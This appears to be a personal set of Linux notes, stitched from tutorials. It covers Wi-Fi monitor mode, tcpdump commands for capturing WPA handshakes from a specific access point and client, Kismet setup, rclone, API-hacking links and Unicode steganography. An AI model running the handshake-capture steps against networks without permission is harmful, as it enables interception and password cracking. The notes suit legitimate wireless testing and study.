sudo adduser $USER wireshark To restore your original interface and to delete the mon0 interface, run the following commands. Replace wlan0 with your original wifi interface noted at the starting of the tutorial. sudo iw dev mon0 del sudo iw phy phy0 interface add wlan0 type managed https://www.nayab.xyz/networking/capture-wireless-packets-monitor-mode-linux tcpdump and wifi iwconfig # list all devices ifconfig wlan0 down # assuming wlan0 is wireless iwconfig wlan0 mode monitor # put into monitor mode ifconfig wlan0 up # bring wlan0 online Set the channel $ iwconfig wlan0 channel 3 $ iw wlan0 info Interface wlan0 ifindex 3 wdev 0x1 addr b0:7d:64:e7:ba:a3 ssid ATTFJ4Br3A type managed wiphy 0 channel 153 (5765 MHz), width: 80 MHz, center1: 5775 MHz txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 $ tcpdump -D 1.wlan0 [Up, Running, Wireless, Associated] 2.phy0.mon [Up, Running, Wireless, Associated] 3.any (Pseudo-device that captures on all interfaces) [Up, Running] 4.lo [Up, Running, Loopback] 5.eth0 [Up, Disconnected] 6.bluetooth1 (Bluetooth adapter number 0) [Wireless, Association status unknown] 7.bluetooth0 (Bluetooth adapter number 1) [Wireless, Association status unknown] 8.bluetooth-monitor (Bluetooth Linux Monitor) [Wireless] 9.nflog (Linux netfilter log (NFLOG) interface) [none] 10.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none] 11.dbus-system (D-Bus system bus) [none] 12.dbus-session (D-Bus session bus) [none] $ iwlist wlan0 frequency wlan0 32 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 36 : 5.18 GHz Channel 40 : 5.2 GHz Channel 44 : 5.22 GHz Channel 48 : 5.24 GHz Channel 52 : 5.26 GHz Channel 56 : 5.28 GHz Channel 60 : 5.3 GHz Channel 64 : 5.32 GHz Channel 100 : 5.5 GHz Channel 104 : 5.52 GHz Channel 108 : 5.54 GHz Channel 112 : 5.56 GHz Channel 116 : 5.58 GHz Channel 120 : 5.6 GHz Channel 124 : 5.62 GHz Channel 128 : 5.64 GHz Channel 132 : 5.66 GHz Channel 136 : 5.68 GHz Channel 140 : 5.7 GHz Current Frequency:5.765 GHz Scan on a specific interface; $ tcpdump -i wlan0 To run tcpdump on an interface in monitoring mode, we can use the -I flag: $ tcpdump -I $ tcpdump -i wlan0 -I Suppressing Address Lookup $ tcpdump -n Switch the interface from managed to monitor mode and switch the channel to 149 (my home network): root@kali:~# ip link set wlan0 down root@kali:~# iw wlan0 set monitor control root@kali:~# iw wlan0 set channel 153 root@kali:~# ip link set wlan0 up Run tcpdump with the interface in monitor mode. We are now capturing the layer 1 (IEEE802_11_RADIO) traffic in the air: root@kali:~# sudo tcpdump -i wlan0 -n In order for tcpdump to filter only handshake frames, use a filter: ether proto 0x888e When capturing handshakes, it is recommended that you always specify the -U option, so that data is immediately written to a file. An example of capturing all handshakes (for any Access Points and clients) and saving them to the test.cap file: sudo tcpdump -i wlan0 -I -w test.cap -e -U ether proto 0x888e Let’s consider the practical situation: you need to capture a handshake from the access point with BSSID 14:9d:09:d0:04:84, which works on channel 8. To capture, I will use a wireless interface named wlp0s20f0u1. To achieve this goal, you need to start by switching the wireless card to the desired channel. Keep in mind that NetworkManager and other programs can automatically switch wireless interfaces to other channels. Therefore, you must either stop the NetworkManager service: sudo systemctl stop NetworkManager.service To switch the Wi-Fi card to a specific channel, use the sequence of commands: sudo ip link set wlan0 down sudo iw wlan0 set monitor control sudo ip link set wlan0 up sudo iw wlan0 set channel 153 An example of a real command that uses the wlan0 interface to capture a handshake, the handshake is saved to the test.cap file, the MAC address of the AP is 14:9d:09:d0:04:84, and the client's MAC address is c0:b6:f9:da:af:3e: $ sudo tcpdump -i wlan0 -I -w test.cap -e -U -c 4 'ether proto 0x888e and (wlan addr1 14:9d:09:d0:04:84 or wlan addr1 c0:b6:f9:da:af:3e)' Ref https://miloserdov.org/?p=3687 Change your DNS servers on Linux Here’s how to change your DNS servers on Linux: Open the terminal by pressing Ctrl + T Enter the following command to become the root user: su Once you’ve entered your root password, run these commands: rm -r /etc/resolv.conf nano /etc/resolv.conf When the text editor opens, type in the following lines: nameserver 103.86.96.100 nameserver 103.86.99.100 Close and save the file. You can do so by clicking Ctrl + X and pressing Y. Continue typing in the terminal: chattr +i /etc/resolv.conf reboot now That’s it! You are now using NordVPN’s DNS servers. sngrep Sngrep is a tool to capture SIP traffic and display the call flow in a terminal nicely. It is made by Irontec and it is in development. Sngrep supports live capture to display realtime SIP packets and can also be used as “.pcap” viewer. To open a .pcap file with sngrep, just execute the next command: $ sngrep -I sngrep_test.pcap TESTING YOUR SIP PROTOCOL VIA SIPP https://freelinuxtutorials.com/testing-your-sip-protocol-via-sipp/ sippts https://pepelux.github.io/sippts/ sipp https://github.com/SIPp/sipp To sort IP addresses numericly $ sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n arp-scan.wifi.071722.1147.txt
Installing
sudo apt install build-essential git libwebsockets-dev pkg-config zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev libpcap-dev libnm-dev libdw-dev libsqlite3-dev libprotobuf-dev libprotobuf-c-dev protobuf-compiler protobuf-c-compiler libsensors4-dev libusb-1.0-0-dev python3 python3-setuptools python3-protobuf python3-requests python3-numpy python3-serial python3-usb python3-dev python3-websockets librtlsdr0 libubertooth-dev libbtbb-dev git clone https://www.kismetwireless.net/git/kismet.git cd kismet ./configure make sudo make suidinstall sudo usermod -aG kismet $USER newgrp - groups Ref: https://www.kismetwireless.net/docs/readme/quickstart/ and https://www.kismetwireless.net/docs/readme/starting_kismet/
This will add the key and repo, then install. I have had problems with...
wget -O - https://www.kismetwireless.net/repos/kismet-release.gpg.key | sudo apt-key add - echo 'deb https://www.kismetwireless.net/repos/apt/release/kali kali main' | sudo tee /etc/apt/sources.list.d/kismet.list sudo apt update sudo apt install kismet
$ sudo kismetdb_to_pcap -i Kismet-20220826-20-36-19-1.kismet -o Kismet-20220826-20-36-19-1.kismet.pcap [sudo] password for parth: Done... -rw-r--r-- 1 root 298475520 Aug 26 21:16 Kismet-20220826-20-36-19-1.kismet -rw-r--r-- 1 root 208045928 Aug 26 21:16 Kismet-20220826-20-36-19-1.kismet.pcap $ sudo kismetdb_statistics --help Kismetdb statistics usage: kismetdb_statistics [OPTION] -i, --in [filename] Input kismetdb file -s, --skip-clean Don't clean (sql vacuum) input database -j, --json Dump stats as a JSON dictionary $ sudo kismetdb_statistics -i Kismet-20220826-20-36-19-1.kismet * Cleaning database 'Kismet-20220826-20-36-19-1.kismet'... KismetDB version: 8 Packets: 472536 Non-packet data: 6 Devices: 182 Devices seen between: 2022-08-26 20:36:20 (1661546180) to 2022-08-27 01:12:07 (1661562727) 2 datasources wlan0 wlan0 5FE308BD-0000-0000-0000-B07D64E7BAA3 linuxwifi Hardware: iwlwifi Packets: 472415 Hop rate: 5.000000/second Hop channels: 1, 1HT40+, 2, 3, 4, 5, 6, 6HT40-, 6HT40+, 7, 8, 9, 10, 11, 11HT40-, 12, 13, 36, 36HT40+, 36VHT80, 36VHT160, 40, 40HT40-, 40VHT80, 44, 44HT40+, 44VHT80, 48, 48VHT80, 52, 52HT40+, 56, 56HT40-, 56VHT80, 60, 60HT40+, 60VHT80, 64, 64HT40-, 64VHT80, 100, 100HT40+, 100VHT80, 100VHT160, 104, 104HT40-, 104VHT80, 108, 108HT40+, 108VHT80, 112, 112HT40-, 112VHT80, 116, 116HT40+, 116VHT80, 120, 120HT40-, 120VHT80, 124, 124HT40+, 124VHT80, 128, 128HT40-, 128VHT80, 132, 132HT40+, 132VHT80, 136, 136HT40-, 136VHT80, 140, 140VHT80, 144, 144HT40-, 144VHT80, 149, 149HT40+, 149VHT80, 153, 153HT40-, 153VHT80, 157, 157HT40+, 157VHT80, 161, 161HT40-, 161VHT80, 165 hci0 hci0 91DD0AE4-0000-0000-0000-B07D64E7BAA7 linuxbluetooth Hardware: linuxhci Packets: 6 Packet tags found in log: DOT11_BEACON_SSID DOT11_RESPONSE_SSID Location data: None Breadcrumb travel distance: 0 Km Packets with location: 0 Data with location: 0 $ sudo kismetdb_clean --help Kismetdb Cleanup Performs a basic cleanup of Kismetdb logs with an incomplete journal file usage: kismetdb_clean [OPTION] -i, --in [filename] Input kismetdb file $ sudo kismetdb_clean --in Kismet-20220826-20-36-19-1.kismet * Cleaning database 'Kismet-20220826-20-36-19-1.kismet'... After cleanup -rw-r--r-- 1 root 298475520 Aug 26 21:20 Kismet-20220826-20-36-19-1.kismet
┌──(parth㉿Parth)-[~] └─$ xmllint --help Unknown option --help Usage : xmllint [options] XMLfiles ... Parse the XML files and output the result of the parsing --version : display the version of the XML library used --debug : dump a debug tree of the in-memory document --shell : run a navigating shell --debugent : debug the entities defined in the document --copy : used to test the internal copy implementation --recover : output what was parsable on broken XML documents --huge : remove any internal arbitrary parser limits --noent : substitute entity references by their value --noenc : ignore any encoding specified inside the document --noout : don't output the result tree --path 'paths': provide a set of paths for resources --load-trace : print trace of all external entities loaded --nonet : refuse to fetch DTDs or entities over network --nocompact : do not generate compact text nodes --htmlout : output results as HTML --nowrap : do not put HTML doc wrapper --valid : validate the document in addition to std well-formed check --postvalid : do a posteriori validation, i.e after parsing --dtdvalid URL : do a posteriori validation against a given DTD --dtdvalidfpi FPI : same but name the DTD with a Public Identifier --quiet : be quiet when succeeded --timing : print some timings --output file or -o file: save to a given file --repeat : repeat 100 times, for timing or profiling --insert : ad-hoc test for valid insertions --compress : turn on gzip compression of output --html : use the HTML parser --xmlout : force to use the XML serializer when using --html --nodefdtd : do not default HTML doctype --push : use the push mode of the parser --pushsmall : use the push mode of the parser using tiny increments --memory : parse from memory --maxmem nbbytes : limits memory allocation to nbbytes bytes --nowarning : do not emit warnings from parser/validator --noblanks : drop (ignorable?) blanks spaces --nocdata : replace cdata section with text nodes --format : reformat/reindent the output --encode encoding : output in the given encoding --dropdtd : remove the DOCTYPE of the input docs --pretty STYLE : pretty-print in a particular style 0 Do not pretty print 1 Format the XML content, as --format 2 Add whitespace inside tags, preserving content --c14n : save in W3C canonical format v1.0 (with comments) --c14n11 : save in W3C canonical format v1.1 (with comments) --exc-c14n : save in W3C exclusive canonical format (with comments) --nsclean : remove redundant namespace declarations --testIO : test user I/O support --catalogs : use SGML catalogs from $SGML_CATALOG_FILES otherwise XML Catalogs starting from file:///etc/xml/catalog are activated by default --nocatalogs: deactivate all catalogs --auto : generate a small doc on the fly --xinclude : do XInclude processing --noxincludenode : same but do not generate XInclude nodes --nofixup-base-uris : do not fixup xml:base uris --loaddtd : fetch external DTD --dtdattr : loaddtd + populate the tree with inherited attributes --stream : use the streaming interface to process very large files --walker : create a reader and walk though the resulting doc --pattern pattern_value : test the pattern support --chkregister : verify the node registration code --relaxng schema : do RelaxNG validation against the schema --schema schema : do validation against the WXS schema --schematron schema : do validation against a schematron --sax1: use the old SAX1 interfaces for processing --sax: do not build a tree but work just at the SAX level --oldxml10: use XML-1.0 parsing rules before the 5th edition --xpath expr: evaluate the XPath expression, imply --noout Libxml project home page: https://gitlab.gnome.org/GNOME/libxml2
-------- Hacking APIs Things to print and study; https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/ https://www.wallarm.com/what/how-to-hack-api-in-60-minutes-with-open-source https://nordicapis.com/5-ways-to-hack-an-api-and-how-to-defend/ https://securityboulevard.com/2021/07/for-hackers-apis-are-low-hanging-fruit/ https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf https://www.zaproxy.org/blog/2017-04-03-exploring-apis-with-zap/ https://www.zaproxy.org/blog/2017-06-19-scanning-apis-with-zap/ https://github.com/dwisiswant0/wadl-dumper https://github.com/SmartBear/soapui https://github.com/arainho/awesome-api-security https://templth.wordpress.com/2014/12/15/designing-a-web-api/ API testing with browser Web Browser In the browser address bar, compose a query URL for the API to access. The format of query URL is: https:// hostname / api ? apikey=value hostname - hostname listed for the API service api - name of the API that is part of url provided in the API Documentation ? - only used in case of options (key=value pairs) separated with & options (key=value pairs): type=json - API data formats key=0a1b3c4d5e6f7g8h9i0j1k2l3m412356 - API key provided after registering an application. Example constructed query: https://gw.its.yale.edu/soa-gateway/buildings/feed?type=json&apikey=0a1b3c4d5e6f7g8h9i0j1k2l3m412345 *apikey in example is not a valid API key --------
This is an interesting list of Commands
https://nixware.net/
This can be achieved via the following executables. List all components: lshw -short Or individually: List the installed hard drives (Brand, model). lshw -class disk View partition info, including RAID: lsblk View installed processor: lscpu List PCI card and controllers: lspci List main board Brand and model: dmidecode -t 2 List network card: lshw -short | grep network List RAM modules and capacity: dmidecode –type 17- see the “part number” and google the code. Example: Part Number: CT102464BA160B.C16 -& Crucible Power supply: dmidecode –type 39 Sensors information: apt-get install lm-sensors sensors-detect sensors
Remove all trailing spaces
Find > Replace... Find What: [ \t]+\n Replace With: \n Replace All
This tool is used to sync files between my laptop and Google Drive.
https://rclone.org/drive/
Note that rclone runs a webserver on your local machine to collect the token as returned from Google if you use auto config mode. This only runs from the moment it opens your browser to the moment you get back the verification code. This is on http://127.0.0.1:53682/ and it may require you to unblock it temporarily if you are running a host firewall, or use manual mode.
List directories in top level of your drive
rclone lsd remote:
List all the files in your drive
rclone ls remote:
To copy a local directory to a drive directory called backup
rclone copy /home/source remote:backup
When rclone downloads a Google doc it chooses a format to download depending upon the --drive-export-formats setting. By default the export formats are docx,xlsx,pptx,svg which are a sensible default for an editable document.
When choosing a format, rclone runs down the list provided in order and chooses the first file format the doc can be exported as from the list. If the file can't be exported to a format on the formats list, then rclone will choose a format from the default list.
If you prefer an archive copy then you might use --drive-export-formats pdf, or if you prefer openoffice/libreoffice formats you might use --drive-export-formats ods,odt,odp.
When importing files into Google Drive, rclone will convert all files with an extension in --drive-import-formats to their associated document type. rclone will not convert any files by default, since the conversion is lossy process.
Sometimes, for no reason I've been able to track down, drive will duplicate a file that rclone uploads. Drive unlike all the other remotes can have duplicated files.
Duplicated files cause problems with the syncing and you will see messages in the log about duplicates.
Use rclone dedupe to fix duplicated files.
Note that this isn't just a problem with rclone, even Google Photos on Android duplicates files on drive sometimes.
rclone sync
https://rclone.org/commands/rclone_sync/
Sync the source to the destination, changing the destination only. Doesn't transfer files that are identical on source and destination, testing by size and modification time or MD5SUM. Destination is updated to match source, including deleting files if necessary (except duplicate objects, see below). If you don't want to delete files from destination, use the copy command instead.
Important: Since this can cause data loss, test first with the --dry-run or the --interactive/-i flag.
rclone sync -i SOURCE remote:DESTINATION
Note: Use the -P/--progress flag to view real-time transfer statistics
This is some additional info that looks very helpful;
https://linuxpip.org/rclone-examples/
https://invisible-characters.com/#:~:text=Invisible%20Unicode%20characters?,+2800%20BRAILLE%20PATTERN%20BLANK).
In Unicode there are a lot of invisible characters: regular white-space characters (e.g. U+0020 SPACE), language specific fillers (e.g. U+3164 HANGUL FILLER of the Korean Hangual alphabet), or special characters (e.g. U+2800 BRAILLE PATTERN BLANK). While all of these have a specific meaning in their natural context, they can be used in various applications that don't allow for regular whitespace characters.
View invisible characters
https://invisible-characters.com/view.html
Here you can view invisible characters inside a block of text. Just copy and paste your text (which contains invisible characters) into the text box below and click the "View!" button.
All about invisible (hidden) text and characters
https://www.onlyoffice.com/blog/2021/12/invisible-text-invisible-characters/
Hidden text or white fonting
Hidden text is the way to insert hidden invisible characters into a web page or an electronic document. Mostly they use a font color the same as a color of a background to be able to hide additional content from sight.
Hidden unreadable text can be used for Search Engine Optimization (SEO) techniques on web pages. They try to create a higher ranking in search engine, like Google, Bing, or Yahoo, adding the same keyword multiple times. It can be used also to add hidden phrases unrelated to content to gain additional traffic.
In some cases, inexperienced users format text documents or slides with invisible characters. Use the same practice to display hidden characters to be able to adjust the imperfect layout.
Also, https://www.researchgate.net/publication/344981371_Combining_Invisible_Unicode_Characters_To_Hide_Information_In_A_Text_Document/fulltext/5f9faeee458515b7cfb2bd5c/Combining-Invisible-Unicode-Characters-To-Hide-Information-In-A-Text-Document.pdf
Also, https://null-byte.wonderhowto.com/how-to/use-zero-width-characters-hide-secret-messages-text-even-reveal-leaks-0198692/
Also, https://330k.github.io/misc_tools/unicode_steganography.html
---[End of File]--- (top)
